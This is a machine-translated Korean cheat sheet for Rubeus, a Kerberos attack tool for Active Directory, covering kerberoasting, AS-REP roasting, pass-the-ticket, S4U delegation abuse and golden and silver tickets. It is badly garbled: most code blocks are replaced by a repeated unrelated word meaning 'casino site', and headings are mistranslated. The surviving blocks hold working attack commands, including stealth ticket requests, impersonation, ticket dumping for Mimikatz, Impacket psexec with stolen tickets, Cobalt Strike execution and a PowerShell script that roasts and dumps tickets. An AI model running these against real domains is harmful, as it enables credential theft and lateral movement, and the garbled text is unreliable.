Rubeus Kerberos 상호 작용 공구 Cheat 장
제품정보
Rubeus는 익지않는 Kerberos 상호 작용과 남용을 위한 C# 연장통입니다. Kerberos 구현을 공격하고 티켓 요청, 갱신 및 다양한 Kerberos 기반 공격에 대한 기능을 포함합니다. Rubeus는 Active Directory 침투 테스트 및 빨간색 팀 작업에 특히 유용합니다.
· ** 보증**: 이 도구는 공인된 침투 테스트 및 보안 평가에만 적용됩니다. 모든 환경에서 사용하기 전에 적절한 권한이 있습니다.
설치하기
사전 컴파일 된 Binary
카지노사이트
소스에서 컴파일
카지노사이트
다운로드 제품 설명
카지노사이트
기본 사용
명령 구조
카지노사이트
유효한 명령
| | Command | Description | |
| --- | --- |
| | asktgt | Request a TGT (Ticket Granting Ticket) | |
| | asktgs | Request a TGS (Ticket Granting Service) | |
| | askticket | Request a ticket for a specific service | |
| | renew | Renew a ticket | |
| | s4u | Perform S4U (Service for User) attacks | |
| | ptt | Pass-the-ticket attacks | |
| | purge | Purge tickets from memory | |
| | describe | Describe ticket contents | |
| | klist | List current tickets | |
| | dump | Dump tickets from memory | |
| | triage | Triage tickets | |
| | monitor | Monitor for new tickets | |
| | harvest | Harvest tickets | |
| | brute | Brute force passwords | |
| | kerberoast | Kerberoasting attacks | |
| | asreproast | AS-REP roasting attacks | |
티켓 요청 및 관리
TGT (티켓 부여 티켓)
카지노사이트
TGS (티켓 보조 서비스)
카지노사이트
티켓 관리
카지노사이트
Kerberoasting 공격
기본 Kerberoasting
카지노사이트
고급 Kerberoasting
카지노사이트
대상 Kerberoasting
카지노사이트
AS-REP 로스팅 공격
기본 AS-REP 로스팅
ο 회원 관리
고급 AS-REP 로스팅
카지노사이트
Pass-the-Ticket (PTT) 공격
기본 패스-티켓
카지노사이트
고급 PTT 기술 정보
카지노사이트
S4U (사용자 서비스) 공격
S4U2자 관련 기사
카지노사이트
S4U2Proxy 공격
카지노사이트
변형된 위임 Abuse
카지노사이트
황금과 실버 티켓 공격
골든 티켓 생성
카지노사이트
실버 티켓 생성
카지노사이트
티켓 수확 및 모니터링
티켓 수확
오프화이트
티켓 감시
카지노사이트
티켓 요금
오프화이트
비밀번호
비밀번호
카지노사이트
Credential 검증
카지노사이트
고급 기술
크로스 도어 관련 기사
카지노사이트
법적 고지
카지노사이트
자원 기반 변형 위임 위임
카지노사이트
Evasion 기술
옵션 정보 관련 기사
카지노사이트
스텔스 운영
# Request tickets without caching
Rubeus.exe asktgt /user:username /password:password /domain:domain.com /ptt /luid:0x0
# Use alternative service names
Rubeus.exe s4u /user:serviceaccount /rc4:hash /impersonateuser:user /msdsspn:cifs/server.domain.com /altservice:host
# Minimize ticket lifetime
Rubeus.exe asktgt /user:username /password:password /domain:domain.com /endtime:01/01/2024
```의 경우
## 다른 도구와 통합
### Mimikatz 통합
```cmd
# Export tickets for Mimikatz
Rubeus.exe dump /outfile:tickets.kirbi
# Use in Mimikatz
mimikatz # kerberos::ptc tickets.kirbi
```에 대하여
### Impacket 통합
```bash
# Convert Rubeus tickets for Impacket
# Use ticket with impacket tools
export KRB5CCNAME=ticket.ccache
python3 psexec.py -k -no-pass domain.com/administrator@target.domain.com
```의 경우
### Cobalt Strike 통합
Cobalt Strike beacon commands
beacon> execute-assembly Rubeus.exe kerberoast beacon> execute-assembly Rubeus.exe asreproast beacon> execute-assembly Rubeus.exe dump ```에 대하여
자동화 스크립트
종합 Kerberos 평가
```powershell
Comprehensive Kerberos assessment script
param( [string]$Domain = $env:USERDOMAIN, [string]$OutputPath = "C:\Temp\KerberosAssessment" )
Create output directory
New-Item -ItemType Directory -Path $OutputPath -Force|Out-Null
Write-Host "[+] Starting comprehensive Kerberos assessment for $Domain"
Kerberoasting
Write-Host "[+] Performing Kerberoasting..." & Rubeus.exe kerberoast /outfile:"$OutputPath\kerberoast.txt" /domain:$Domain
AS-REP Roasting
Write-Host "[+] Performing AS-REP Roasting..." & Rubeus.exe asreproast /outfile:"$OutputPath\asreproast.txt" /domain:$Domain
Ticket triage
Write-Host "[+] Triaging current tickets..." & Rubeus.exe triage|Out-File "$OutputPath\ticket_triage.txt"
Dump tickets
Write-Host "[+] Dumping tickets..." & Rubeus.exe dump|Out-File "$OutputPath\ticket_dump.txt"
Write-Host "[+] Assessment complete. Results saved to $OutputPath" ```의 경우
자동 티켓 수확
카지노사이트
도메인 Reconnaissance 스크립트
카지노사이트
문제 해결
일반적인 문제
카지노사이트
Debug 모드
카지노사이트
오류 해결
카지노사이트
최고의 연습
운영 보안
- ** 합법적인 계정 사용 **: 가능한 경우 의심스러운 서비스 계정
- Limit 요청: 요청으로 도메인 컨트롤러를 홍수시키지 마십시오.
- 시간 동기화: 시계 skew를 피하기 위하여 적당한 시간 동기화를 지킵니다
- 명세 ** 청소 ** : 작업 후 인젝터 티켓을 제거
- 명세 Monitor 로그 : 생성된 보안 이벤트의 인식
공격 전략
카지노사이트
지원하다
이 속임수 시트는 Rubeus를 사용하여 포괄적 인 참조를 제공합니다. Active Directory 보안 평가를 수행하기 전에 항상 적절한 승인이 있습니다. 필수